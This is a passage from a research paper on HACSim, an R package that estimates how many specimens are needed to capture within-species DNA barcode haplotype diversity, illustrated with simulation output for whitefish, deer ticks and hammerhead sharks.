Mean number of haplotypes sampled: 13.8705 Mean number of haplotypes not sampled: 1.1295 Proportion of haplotypes sampled: 0.9247 Proportion of haplotypes not sampled: 0.0753 Mean value of N*: 603.439 Mean number of specimens not sampled: 45.43895 Desired level of haplotype recovery has not yet been reached | ==========================================================| 100% ---Measures of Sampling Closeness --- Mean number of haplotypes sampled: 14.3708 Mean number of haplotypes not sampled: 0.6292 Proportion of haplotypes sampled: 0.9580533 Proportion of haplotypes not sampled: 0.04194667 Mean value of N*: 630.4451 Mean number of specimens not sampled: 26.44507 Desired level of haplotype recovery has been reached ---------- Finished. ---------- The initial guess for sampling sufficiency was N = 235 individuals The algorithm converged after 8 iterations and took 241.235 s The estimate of sampling sufficiency for p = 95% haplotype recovery is N∗= 604 individuals ( 95% CI: 601.504-606.496 ) The number of additional specimens required to be sampled for p = 95% haplotype recovery is N* - N = 369 individuals From the above output, it is clear that current specimen sample sizes found within BOLD for C. clupeaformis are probably not sufficient to capture the majority of within-species COI haplotype variation. An initial sample size of N = 235 specimens corresponds to recovering only 73.8% of all H* = 15 unique haplotypes for this species (Fig. 9). Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 18/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 Figure 8 Initial haplotype frequency distribution for N = 235 high-quality lake whitefish (Coregonus clupeaformis) COI barcode sequences obtained from BOLD. This species displays a highly-skewed pat- tern of observed haplotype variation, with Haplotype 1 accounting for c. 91.5% (215/235) of all sampled records. Full-size DOI: 10.7717/peerjcs.243/fig-8 Figure 9 Initial graphical output of HAC.sim() for a real species (Lake whitefish, C. clupeaformis) hav- ing a single dominant haplotype. (A) Specimens sampled; (B) Unique haplotypes. In this example, ini- tially, only R=73.8% of the H*=15 estimated haplotypes for this species have been recovered based on a sample size of N =235 specimens. The haplotype frequency barplot is identical to that of Fig. 8. Full-size DOI: 10.7717/peerjcs.243/fig-9 A sample size of N* = 604 individuals (95% CI [601.504–606.496]) would likely be needed to observe 95% of all existing genetic diversity for lake whitefish (Fig. 10). Since N =235 individuals have been sampled previously, only N∗−N =369 specimens remain to be collected. Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 19/37 https://peerj.com https://doi.org/10.7717/peerjcs.243/fig-8 https://doi.org/10.7717/peerjcs.243/fig-9 http://dx.doi.org/10.7717/peerj-cs.243 Figure 10 Final graphical output of HAC.sim() for Lake whitefish (C. clupeaformis) having a single dominant haplotype. (A) Specimens sampled; (B) Unique haplotypes. Upon convergence, R = 95.8% of the H*=15 estimated haplotypes for this species have been uncovered with a sample size of N =604 specimens. Full-size DOI: 10.7717/peerjcs.243/fig-10 Deer tick (Ixodes scapularis) Ticks, particularly the hard-bodied ticks (Arachnida: Acari: Ixodida: Ixodidae), are well- known as vectors of various zoonotic diseases including Lyme disease (Ondrejicka et al., 2014). Apart from this defining characteristic, the morphological identification of ticks at any lifestage, by even expert taxonomists, is notoriously difficult or sometimes even impossible (Ondrejicka, Morey & Hanner, 2017). Further, the presence of likely high cryptic species diversity in this group means that turning to molecular techniques such as DNA barcoding is often the only feasible option for reliable species diagnosis. Lyme-competent specimens can be accurately detected through employing a sensitive quantitative PCR (qPCR) procedure (Ondrejicka, Morey & Hanner, 2017). However, for such a workflow to be successful, wide coverage of within-species haplotype variation from across broad geographic ranges is paramount to better aid design of primer and probe sets for rapid species discrimination. Furthermore, the availability of large specimen sample sizes for tick species of medical and epidemiological relevance is necessary for accurately assessing the presence of the barcode gap. Notably, the deer tick (Ixodes scapularis), native to Canada and the United States, is the primary carrier of Borrelia burgdorferi, the bacterium responsible for causing Lyme disease in humans in these regions. Because of this, I. scapularis has been the subject of intensive taxonomic study in recent years. For instance, in a recent DNA barcoding study of medically-relevant Canadian ticks, Ondrejicka, Morey & Hanner (2017) found that out of eight specimens assessed for the presence of B. burgdorferi, 50% tested positive. However, as only exoskeletons and a single leg were examined for systemic infection, the reported infection rate may be a lower bound due to the fact that examined specimens may still harbour B. burgdorferi in their gut. As such, this species is well-represented within BOLD and thus warrants further examination within the present study. As of August 27, 2019, 531 5′-COI DNA barcode sequences are accessble from BOLD’s Public Data Portal for this species. Of these, N = 349 met criteria for high quality Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 20/37 https://peerj.com https://doi.org/10.7717/peerjcs.243/fig-10 http://dx.doi.org/10.7717/peerj-cs.243 outlined in Phillips et al. (2015). A 658 bp MUSCLE alignment comprised H*=83 unique haplotypes. Haplotype analysis revealed that Haplotypes 1–8 were represented by more than 10 specimens (range: 12–46; Fig. 11). Simulation output of HACSim is depicted below. ### Run simulations ### > HACSObj<-HACReal() > HAC.simrep(HACSObj) Simulating haplotype accumulation... | ======================================================| 100% --- Measures of Sampling Closeness --- Mean number of haplotypes sampled: 65.3514 Mean number of haplotypes not sampled: 17.6486 Proportion of haplotypes sampled: 0.7873663 Proportion of haplotypes not sampled: 0.2126337 Mean value of N*: 443.2499 Mean number of specimens not sampled: 94.24988 Desired level of haplotype recovery has not yet been reached | ============================================| 100% ---Measures of Sampling Closeness --- Mean number of haplotypes sampled: 78.3713 Mean number of haplotypes not sampled: 4.6287 Proportion of haplotypes sampled: 0.9442325 Proportion of haplotypes not sampled: 0.05576747 Mean value of N*: 802.7684 Mean number of specimens not sampled: 44.76836 Desired level of haplotype recovery has not yet been reached | =========================================================| 100% ---Measures of Sampling Closeness --- Mean number of haplotypes sampled: 79.2147 Mean number of haplotypes not sampled: 3.7853 Proportion of haplotypes sampled: 0.954394 Proportion of haplotypes not sampled: 0.04560602 Mean value of N*: 841.3716 Mean number of specimens not sampled: 38.37161 Desired level of haplotype recovery has been reached ---------- Finished. ---------- The initial guess for sampling sufficiency was N = 349 individuals The algorithm converged after 8 iterations and took 1116.468 s The estimate of sampling sufficiency for p = 95% haplotype recovery is N∗= 803 individuals ( 95% CI: 801.551-804.449 ) The number of additional specimens required to be sampled for p = 95% haplotype recovery is N* - N = 454 individuals Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 21/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 Figure 11 Initial haplotype frequency distribution for N = 349 high-quality deer tick (Ixodes scapu- laris) COI barcode sequences obtained from BOLD. In this species, Haplotypes 1-8 account for c. 51.3% (179/349) of all sampled records. Full-size DOI: 10.7717/peerjcs.243/fig-11 Figure 12 Initial graphical output of HAC.sim() for a real species (Deer tick, I. scapularis) having eight dominant haplotypes. In this example, initially, only R=78.7% of the H*=83 estimated haplotypes for this species have been recovered based on a sample size of N =349 specimens. The haplotype frequency barplot is identical to that of Fig. 11. Full-size DOI: 10.7717/peerjcs.243/fig-12 The above results clearly demonstrate the need for increased specimen sample sizes in deer ticks. With an initial sample size of N = 349 individuals, only 78.7% of all observed haplotypes are recovered for this species (Fig. 12). N*=803 specimens (95% CI: 801.551-804.449) is necessary to capture at least 95% of standing haplotype variation for I. scapularis (Fig. 13) . Thus, a further N*−N =454 specimens are required to be collected. Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 22/37 https://peerj.com https://doi.org/10.7717/peerjcs.243/fig-11 https://doi.org/10.7717/peerjcs.243/fig-12 http://dx.doi.org/10.7717/peerj-cs.243 Figure 13 Final graphical output of HAC.sim() for deer tick (I scapularis) having eight dominant hap- lotypes. Upon convergence, R = 95.4% of the H*=83 estimated haplotypes for this species have been uncovered with a sample size of N =803 specimens. Full-size DOI: 10.7717/peerjcs.243/fig-13 Scalloped hammerhead (Sphyrna lewini) Sharks (Chondrichthyes: Elasmobranchii: Selachimorpha) represent one of the most ancient extant lineages of fishes. Despite this, many shark species face immediate extinction as a result of overexploitation, together with a unique life history (e.g., K-selected, predominant viviparity, long gestation period, lengthy time to maturation) and migration behaviour (Hanner, Naaum & Shivji, 2016). A large part of the problem stems from the increasing consumer demand for, and illegal trade of, shark fins, meat and bycatch on the Asian market. The widespread, albeit lucrative practice of ‘‘finning’’, whereby live sharks are definned and immediately released, has led to the rapid decline of once stable populations (Steinke et al., 2017). As a result, numerous shark species are currently listed by the International Union for the Conservation of Nature (IUCN) and the Convention on International Trade in Endangered Species of Wild Fauna and Flora (CITES). Interest in the molecular identification of sharks through DNA barcoding is multifold. The COI reference sequence library for this group remains largely incomplete. Further, many shark species exhibit high intraspecific distances within their barcodes, suggesting the possibility of cryptic species diversity. Instances of hybridization between sympatric species has also been documented. As establishing species-level matches to partial specimens through morphology alone is difficult, and such a task becomes impossible once fins are processed and sold for consumption or use in traditional medicine, DNA barcoding has paved a clear path forward for unequivocal diagnosis in most cases. The endangered hammerheads (Family: Sphyrnidae) represent one of the most well- sampled groups of sharks within BOLD to date. Fins of the scalloped hammerhead (Sphyrna lewini) are especially highly prized within IUU (Illegal, Unregulated, Unreported) fisheries due to their inclusion as the main ingredient in shark fin soup. As of August 27, 2019, 327 S. lewini specimens (sequenced at both barcode and non- barcode markers), collected from several Food and Agriculture Organization (FAO) regions, including the United States, are available through BOLD’s Public Data Portal. Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 23/37 https://peerj.com https://doi.org/10.7717/peerjcs.243/fig-13 http://dx.doi.org/10.7717/peerj-cs.243 Of these, all high-quality records (N = 171) were selected for alignment in MEGA7 and assessment via HACSim. The final alignment was found to comprise H* = 12 unique haplotypes, of which three were represented by 20 or more specimens (range: 28–70; Fig. 14). HACSim results are displayed below. ### Run simulations ### > HACSObj<-HACReal() > HAC.simrep(HACSObj) Simulating haplotype accumulation... | ======================================================| 100% ---Measures of Sampling Closeness --- Mean number of haplotypes sampled: 9.9099 Mean number of haplotypes not sampled: 2.0901 Proportion of haplotypes sampled: 0.825825 Proportion of haplotypes not sampled: 0.174175 Mean value of N*: 207.0657 Mean number of specimens not sampled: 36.06566 Desired level of haplotype recovery has not yet been reached ===================================================== 100% ---Measures of Sampling Closeness --- Mean number of haplotypes sampled: 11.3231 Mean number of haplotypes not sampled: 0.6769 Proportion of haplotypes sampled: 0.9435917 Proportion of haplotypes not sampled: 0.05640833 Mean value of N*: 413.3144 Mean number of specimens not sampled: 23.31438 Desired level of haplotype recovery has not yet been reached ===================================================== 100% ---Measures of Sampling Closeness --- Mean number of haplotypes sampled: 11.4769 Mean number of haplotypes not sampled: 0.5231 Proportion of haplotypes sampled: 0.9564083 Proportion of haplotypes not sampled: 0.04359167 Mean value of N*: 432.8695 Mean number of specimens not sampled: 18.8695 Desired level of haplotype recovery has been reached ---------- Finished. ---------- The initial guess for sampling sufficiency was N = 171 individuals The algorithm converged after 9 iterations and took 174.215 s The estimate of sampling sufficiency for p = 95% haplotype recovery is N* = 414 individuals ( 95% CI: 411.937-416.063 ) The number of additional specimens required to be sampled for p = 95% haplotype recovery is N* - N = 243 individuals Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 24/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 Figure 14 Initial haplotype frequency distribution for N = 171 high-quality scalloped hammerhead (Sphyrna lewini) COI barcode sequences obtained from BOLD. In this species, Haplotypes 1–3 account for c. 87.7% (150/171) of all sampled records. Full-size DOI: 10.7717/peerjcs.243/fig-14 Figure 15 Initial graphical output of HAC.sim() for a real species (Scalloped hammerhead, S. lewini) having three dominant haplotypes. In this example, initially, only R = 82.6% of the H*=12 estimated haplotypes for this species have been recovered based on a sample size of N =171 specimens. The haplo- type frequency barplot is identical to that of Fig. 14. Full-size DOI: 10.7717/peerjcs.243/fig-15 Simulation output suggests that only 82.6% of all unique haplotypes for the scalloped hammerhead have likely been recovered (Fig. 15) with a sample size of N = 171. Further, HACSim predicts that N* = 414 individuals (95% CI [411.937–416.063]) probably need to be randomly sampled to capture the majority of intraspecific genetic diversity within 5′-COI (Fig. 16). Since 171 specimens have already been collected, this leaves an additional N* − N = 243 individuals which await sampling. Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 25/37 https://peerj.com https://doi.org/10.7717/peerjcs.243/fig-14 https://doi.org/10.7717/peerjcs.243/fig-15 http://dx.doi.org/10.7717/peerj-cs.243 Figure 16 Final graphical output of HAC.sim() for scalloped hammerhead (S. lewini) having three dominant haplotypes. Upon convergence, R = 95.6% of the H*=12 estimated haplotypes for this species have been uncovered with a sample size of N =414 specimens. Full-size DOI: 10.7717/peerjcs.243/fig-16 DISCUSSION Initializing HACSim and overall algorithm behaviour The overall stochastic behaviour of HACSim is highly dependent on the number of permutations used upon algorithm initialization. Provided that the value assigned to the perms argument is set high enough, numerical results ouputted by HACSim will be found to be quite consistent between consecutive runs whenever all remaining parameter values remain unchanged. It is crucial that perms not be set to too low a value to prevent the algorithm from getting stuck at local maxima and returning suboptimal solutions. This is a common situation with popular optimization algorithms such as hill-climbing. Attention therfore must be paid to avoid making generalizations based on algorithm performance and obtained simulation results (Spall, 2012). In applying the present method to simulated species data, it is important that selected simulation parameters are adequately reflective of those observed for real species. Thus, initial sample sizes should be chosen to cover a wide range of values based on those currently observed within BOLD. Such information can be gauged through examining species lists associated with BOLD records, which are readily accessible through Linnean search queries within the Taxonomy browser. As with any iterative numerical algorithm, selecting good starting guesses for initialization is key. While HACSim is globally convergent (i.e., convergence is guaranteed for any value of N ≥ H*), a good strategy when simulating hypothetical species is to start the algorithm by setting N = H*. In this way, the observed fraction of haplotypes found, R, will not exceed the desired level of haplotype recovery p, and therefore lead to overestimation of likely required specimen sample sizes. Setting N high enough will almost surely result in R exceeding p. Thus, arbitrarily large values of N may not be biologically meaningful or practical. However, in the case of hypothetical species simulation, should initial sample sizes be set too high, such that R > p, a straightforward workaround is to observe where the dashed horizontal line intersects the final haplotype accumulation curve Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 26/37 https://peerj.com https://doi.org/10.7717/peerjcs.243/fig-16 http://dx.doi.org/10.7717/peerj-cs.243 (i.e., not the line the touches the curve endpoint). The resulting value of N at this point will correspond with p quite closely. This can be seen in Fig. 5, where an eyeball guess just over N* = 20 individuals is necessary to recover p = 95% haplotype variation. A more reliable estimate can be obtained through examining the dataframe ‘‘d’’ outputted once the algorithm has halted (via envr$d). In this situation, simply look in the row corresponding to pH* ≥ 0.95(10) ≥ 9.5. The required sample size is the value given in the first column (specs). This is accomplished via the R code envr$d[which(envr$d$means >= envr$p * envr$Hstar), ][1, 1]. The novelty of HACSim is that it offers a systematic means of estimating likely specimen sample sizes required to assess intraspecific haplotype diversity for taxa within large-scale genomic databases like GenBank and BOLD. Estimates of sufficient sampling suggested by our algorithm can be employed to assess barcode coverage within existing reference sequence libraries and campaign projects found in BOLD. While comparison of our method to already-established ones is not yet possible, we anticipate that HACSim will nevertheless provide regulatory applications with an unprecedented view and greater understanding of the state of standing genetic diversity (or lack thereof) within species. Additional capabilities and extending functionality of HACSim In this paper, we illustrate the application of haplotype accumulation curves to the broad assessment of species-level genetic variation. However, HACSim is quite flexible in that one can easily explore likely required sample sizes at higher taxonomic levels (e.g., order, family, genus) or specific geographic regions (e.g., salmonids of the Great Lakes) with ease. Such applicability will undoubtedly be of interest at larger scales (i.e.. entire genomic sequence libraries). For instance, due to evidence of sampling bias in otherwise densely-sampled taxa housed in BOLD (e.g., Lepidoptera), D’Ercole et al. (J. D’Ercole, 2019, unpublished data) wished to assess whether or not intraspecific haplotype variation within butterfly species remains unsampled. To test this, the authors employed HACSim to examine sampling comprehensiveness for species comprising a large barcode reference library for North American butterflies spanning 814 species and 14,623 specimens. We foresee use of HACSim being widespread within the DNA barcoding community. As such, improvements to existing code in terms of further optimization and algorithm runtime, as well as implementation of new methods by experienced R programmers in the space of DNA-based taxonomic identification, seems bright. Potential extensions of our algorithm include support for the exploration of genetic variation at the Barcode Index Number (BIN) level (Ratnasingham & Hebert, 2013), as well as high-throughput sequencing (HTS) data for metabarcoding and environmental DNA (eDNA) applications. Such capabilities are likely to be challenging to implement at this stage until robust operational taxonomic unit (OTU) clustering algorithms are developed (preferably in R). One promising tool in this regard for barcoding of bulk samples of real species and mock communities of known species composition is JAMP (Just Another Metabarcoding Pipeline) devised for use in R by Elbrecht and colleagues (Elbrecht et al., 2018). JAMP includes a sequence read denoising tool that can be used to obtain haplotype numbers and frequency information (H* and probs). However, because JAMP relies Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 27/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 on third-party software (particularly USEARCH (Edgar, 2010) and VSEARCH (Rognes et al., 2016)), it cannot be integrated within HACSim itself and will thus have to be used externally. In extending HACSim to next-generation space, two issues arise. First, it is not immediately clear how the argument N , is to be handled since multiple reads could be associated with single individuals. That is, unlike in traditional Sanger-based sequencing, there is not a one-to-one correspondence between specimen and sequence (Wares & Pappalardo, 2015; Adams et al., 2019). Second, obtaining reliable haplotype information from noisy HTS datasets is challenging without first having strict quality filtering criteria in place to minimize the occurrence of rare, low-copy sequence variants which may reflect artifacts stemming from the Polymerase Chain Reaction (PCR) amplification step or sequencing process (Elbrecht et al., 2018; Braukmann et al., 2019; Turon et al., 2019). Turning to molecular population genetics theory might be the answer (Adams et al., 2019). Wares & Pappalardo (2015) suggest three different approaches to estimating the number of specimens of a species that may have contributed to a metabarcoding sample: (1) use of prior estimates of haplotype diversity, together with observed number of haplotypes; (2) usage of Ewens’ sampling formula (Ewens, 1972) along with estimates of Watterson’s θ (not to be confused with the θ denoting true sampling sufficency herein) (Watterson, 1975), as well as total number of sampled haplotypes; and (3) employment of an estimate of θ and the number of observed variable sites (S) within a multiple sequence alignment. A direct solution we propose might be to use sequencing coverage/depth (i.e., the number of sequence reads) as a proxy for number of individuals. The outcome of this would be an estimate of the mean/total number of sequece reads required for maximal haplotype recovery. However, the use of read count as a stand-in for number of specimens sampled would require the unrealistic assumption that all individuals (i.e., both alive and dead) shed DNA into their environment at equal rates. The obvious issue with extending HACSim to handle HTS data is computing power, as such data typically consists of millions of reads spanning multiple gigabytes of computer memory. Summary Here, we introduced a new statistical approach to assess specimen sampling depth within species based on existing gene marker variation found in public sequence databanks such as BOLD and GenBank. HACSim is both computationally efficient and easy to use. We show utility of our proposed algorithm through both hypothetical and real species genomic sequence data. For real species (here, lake whitefish, deer tick and scalloped hammerhead), results from HACSim suggest that comprehensive sampling for species comprising large barcode libraries within BOLD, such as Actinopterygii, Arachnida and Elasmobranchii is far from complete. With the availability of HACSim, appropriate sampling guidelines based on the amount of potential error one is willing to tolerate can now be established. For the purpose of addressing basic questions in biodiversity science, the employment of small taxon sample sizes may be adequate; however, this is not the case for regulatory applications, where greater than 95% coverage of intraspecific haplotype variation is needed to provide high confidence in sequence matches defensible in a court of law. Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 28/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 Of immediate interest is the application of our method to other ray-finned fishes, as well as other species from deeply inventoried taxonomic groups such as Elasmobranchii (e.g., sharks), Insecta (e.g., Lepidoptera, Culicidae (mosquitoes)), Arachnida (e.g., ticks) and Chiroptera (bats) that are of high conservation, medical and/or socioeconomic importance. Although we explicitly demonstrate the use of HACSim through employing COI, it would be interesting to extend usage to other barcode markers such as the ribulose-1,5-bisphosphate carboxylase/oxygenase large subunit (rbcL) and maturase K (matK) chloroplast genes for land plants, as well as the nuclear internal transcribed spacer (ITS) marker regions for fungi. The application of our method to non-barcode genes routinely employed in specimen identification like mitochondrial cytochrome b (cytb) in birds for instance (Baker, Sendra Tavares & Elbourne, 2009; Lavinia et al., 2016), nuclear rhodopsin (rho) for marine fishes (Hanner et al., 2011) or the phosphoenolpyruvate carboxykinase (PEPCK) nuclear gene for bumblebees (Williams et al., 2015) is also likely to yield interesting results since sequencing numerous individuals at several different genomic markers can often reveal evolutionary patterns not otherwise seen from employing a single-gene approach (e.g., resolution of cryptic species or confirmation/revision of established taxonomic placements) (Williams et al., 2015). While it is reasonable that HACSim can be applied to genomic regions besides 5′-COI, careful consideration of varying rates of molecular evolution within rapidly-evolving gene markers and the effect on downsteam inferences is paramount, as is sequence quality. Previous work in plants (Genus: Taxus) by Liu et al. (2012) has found evidence of a correlation between mutation rate and required specimen sampling depth: genes evolving at faster rates will likely require larger sample sizes to estimate haplotype diversity compared to slowly-evolving genomic loci. We simply focused on 5′-COI because it is by far the most widely sequenced mitochondrial locus for specimen identification, owing to its desirable biological properties as a DNA barcode for animal taxa and because it has an associated data standard to help filter out poor-quality data. (Phillips, Gillis & Hanner, 2019). However, it should be noted that species diagnosis using COI and other barcode markers is not without its challenges. While COI accumulates variation at an appreciable rate, certain taxonomic groups are not readily distinguished on the basis of their DNA barcodes (e.g., the so-called ‘‘problem children’’, such as Cnidaria, which tend to lack adequate sequence divergence (Bucklin, Steinke & Blanco-Bercial, 2011)). Other taxa, like Mollusca, are known to harbour indel mutations (Layton, Martel & Hebert, 2014). Introns within Fungi greatly complicate sequence alignment (Min & Hickey, 2007). Thus, users of HACSim must exercise caution in interpreting end results with other markers, particularly those which are not protein-coding. It is necessary to consider the importance of sampling sufficiency as it pertains to the myriad regulatory applications of specimen identification established using DNA barcoding (e.g., combatting food fraud) in recent years. It since has become apparent that the success of such endeavours is complicated by the ever-evolving state of public reference sequence libraries such as those found within BOLD, in addition to the the inclusion of questionable sequences and lack of sufficent metadata for validation purposes in other genomic databases like GenBank (e.g., Harris (2003)). Dynamic DNA-based identification Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 29/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 systems may produce multiple conflicting hits to otherwise corresponding submissions over time. This unwanted behaviour has led to a number of regulatory agencies creating their own static repositories populated with expertly-identified sequence records tied to known voucher specimens deemed fit-for-purpose for molecular species diagnosis and forensic compliance (e.g., the United States Food and Drug Administration (USFDA)’s Reference Standard Sequence Library (RSSL) employed to identify unknown seafood samples from species of high socioeconomic value). While such a move has partially solved the problem of dynamism inherent in global sequence databases, there still remains the issue of low sample sizes that can greatly inflate the perception of barcode gaps between species. Obtaining adequate representation of standing genetic variation, both within and between species, is therefore essential to mitigating false assignments using DNA barcodes. To this end, we propose the use of HACSim to assess the degree of saturation of haplotype accumulation curves to aid regulatory scientists in rapidly and reliably projecting likely sufficient specimen sample sizes required for accurate matching of unknown queries to known Linnean names. A defining characteristic of HACSim is its convergence behaviour: the method converges to the desired level of haplotype recovery p for any initial guess N specified by the user. Based on examples explored herein, it appears likely that already-sampled species within repositories like BOLD are far from being fully characterized on the basis of existing haplotype variation. In addition to this, it is important to consider the current limitations of our algorithm. We can think of only one: it must be stressed that appropriate sample size trajectories are not possible for species with only single representatives within public DNA sequence databases because haplotype accumulation is unachievable with only one DNA sequence and/or a single sampled haplotype. Hence, HACSim can only be applied to species with at least two sampled specimens. Thus, application of our method to assess necessary sample sizes for full capture of extant haplotype variation in exceedingly rare or highly elusive taxa is not feasible. Despite this, we feel that HACSim can greatly aid in accurate and rapid barcode library construction necessary to thoroughly appreciate the diversity of life on Earth. CONCLUSIONS Herein, a new, easy-to-use R package was presented that can be employed to estimate intraspecific sample sizes for studies of genetic diversity assessment, with a particular focus on animal DNA barcoding using the COI gene. HACSim employs a novel nonparametric stochastic iterative extrapolation algorithm with good convergence properties to generate haplotype accumulation curves. Because our approach treats species’ haplotypes as numeric labels, any genomic locus can be targeted to probe levels of standing genetic variation within multicellular taxa. However, we stress that users must exercise care when dealing with sequence data from non-coding regions of the genome, since these are likely to comprise sequence artifacts such as indels and introns, which can both hinder successful sequence alignment and lead to overestimation of existing haplotype variation within species. The application of our method to assess likely required sample sizes for both Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 30/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 hypothetical and real species produced promising results. We argue the use of HACSim will be of broad interest in both academic and industry settings, most notably, regulatory agencies such as the Canadian Food Inspection Agency (CFIA), Agriculture and Agri-Food Canada (AAFC), United States Department of Agriculture (USDA), Public Health Agency of Canada (PHAC) and the USFDA. While HACSim is an ideal tool for the analysis of Sanger sequencing reads, an obvious next step is to extend usability to Next-Generation Sequencing (NGS), especially HTS applications. With these elements in place, even the full integration of HACSim to assess comprehensiveness of taxon sampling within large sequence databases such as BOLD seems like a reality in the near future. ACKNOWLEDGEMENTS The authors wish to extend thanks to Robert (Rob) Young for helpful discussions and providing critical feedback on an earlier draft of this manuscript that greatly improved its flow and overall readability. We acknowledge that the University of Guelph resides on the ancestral lands of the Attawandaron people and the treaty lands and territory of the Mississaugas of the Credit. We recognize the significance of the Dish with One Spoon Covenant to this land and offer our respect to our Anishinaabe, Haudenosaunee and Métis neighbours as we strive to strengthen our relationships with them. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the College of Physical and Engineering Science (CPES) Graduate Excellence Entrance Scholarship to Jarrett D. Phillips. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: College of Physical and Engineering Science (CPES) Graduate Excellence Entrance Scholarship. Competing Interests The authors declare there are no competing interests. Author Contributions • Jarrett D. Phillips conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Steven H. French conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Robert H. Hanner and Daniel J. Gillis conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 31/37 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.243 Data Availability The following information was supplied regarding data availability: The aligned and trimmed DNA barcodes are available at FigShare: Phillips, Jarrett (2019): Coregonus clupeaformis 5′-COI DNA barcode sequences. figshare. Dataset. 10.6084/m9.figshare.8870804.v1. Phillips, Jarrett (2019): Ixodes scapularis 5′-COI DNA barcode sequences. figshare. Dataset. 10.6084/m9.figshare.10006595.v1. Phillips, Jarrett (2019): Sphyrna lewini 5′-COI DNA barcode sequences. figshare. Dataset. 10.6084/m9.figshare.10006598.v1. A stable version of the algorithm is available on GitHub: https://github.com/jphill01/ HACSim.R, along with a detailed README on how to run code. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.243#supplemental-information. REFERENCES Adams C, Knapp M, Gemmell N, Jeunen G-J, Bunce M, Lamare M, Taylor H. 2019. Beyond biodiversity: can environmental DNA (eDNA) cut it as a population genetics tool Genes 10(192):1–20 DOI 10.3390/genes10030192. April J, Hanner RH, Dion-Côté A-M, Bernatchez L. 2013a. Glacial cycles as an allopatric speciation pump in north-eastern American freshwater fishes. Molecular Ecology 22(2):409–422 DOI 10.1111/mec.12116. April J, Hanner RH, Mayden RL, Bernatchez L. 2013b. Metabolic rate and climatic fluctuations shape continental wide pattern of genetic divergence and biodiversity in fishes. PLOS ONE 8(7):e70296 DOI 10.1371/journal.pone.0070296. April J, Mayden RL, Hanner RH, Bernatchez L. 2011. Genetic calibration of species diversity among North America’s freshwater fishes. Proceedings of the National Academy of Sciences of the United States of America 108(26):10602–10607 DOI 10.1073/pnas.1016437108. Baker A, Sendra Tavares E, Elbourne R. 2009. Countering criticisms of single mito- chondrial DNA gene barcoding in birds. Molecular Ecology Resources 9(S1):257–268 DOI 10.1111/j.1755-0998.2009.02650.x. Bergsten J, Bilton DT, Fujisawa T, Elliott M, Monaghan MT, Balke M, Hendrich L, Geijer J, Herrmann J, Foster GN, I R, Nilsson A, Barraclough T, Vogler A. 2012. The effect of geographical scale of sampling on DNA barcoding. Systematic Biology 61(5):851–869. Braukmann T, Ivanova N, Prosser S, Elbrecht V, Steinke D, Ratnasingham S, De Waard J, Sones J, Zakharov E, Hebert P. 2019. Metabarcoding a diverse arthropod mock community. Molecular Ecology Resources 19(3):711–727. Brown SD, Collins RA, Boyer S, Lefort M-C, Malumbres-Olarte J, Vink CJ, Cruick- shank RH. 2012. Spider: an R package for the analysis of species identity and Phillips et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.243 32/37 https://peerj.com https://doi.org/10.6084/m9.figshare.8870804.v1 https://doi.org/10.6084/m9.figshare.10006595.v1 https://doi.org/10.6084/m9.figshare.10006598.v1 https://github.com/jphill01/HACSim.R https://github.com/jphill01/HACSim.R http://dx.doi.org/10.7717/peerj-cs.243#supplemental-information http://dx.doi.org/10.7717/peerj-cs.243#supplemental-information http://dx.doi.org/10.3390/genes10030192 http://dx.doi.org/10.1111/mec.12116 http://dx.doi.org/10.1371/journal.pone.0070296 http://dx.doi.org/10.1073/pnas.1016437108 http://dx.doi.org/10.1111/j.1755-0998.2009.02650.x http://dx.doi.org/10.7717/peerj-cs.243 evolution, with particular reference to DNA barcoding. Molecular Ecology Resources 12(3):562–565 DOI 10.1111/j.1755-0998.2011.03108.x. Bucklin A, Steinke D, Blanco-Bercial L. 2011. DNA barcoding of marine metazoa. Annual Review of Marine Science 3:471–508 DOI 10.1146/annurev-marine-120308-080950. Cameron S, Rubinoff D, Will K. 2006. Who will actually use DNA barcoding and what will it cost Systematic Biology 55(5):844–847 DOI 10.1080/10635150600960079. Čandek K, Kuntner M. 2015. DNA barcoding gap: reliable species identification over morphological and geographical scales. Molecular Ecology Resources 15(2):268–277 DOI 10.1111/1755-0998.12304. Casella G, Berger R. 2002. Statistical inference. California: Duxbury Thomson Learning. Ceballos G, Ehrlich PR, Barnosky AD, García A, Pringle RM, Palmer TM. 2015. Accel- erated modern human–induced species losses: entering the sixth mass extinction. Science Advances 1(5):e1400253 DOI 10.1126/sciadv.1400253. Chao A. 1984. Nonparametric estimation of the number of classes in a population. Scandinavian Journal of Statistics 11:265–270. Collins R, Cruickshank R. 2013. The seven deadly sins of 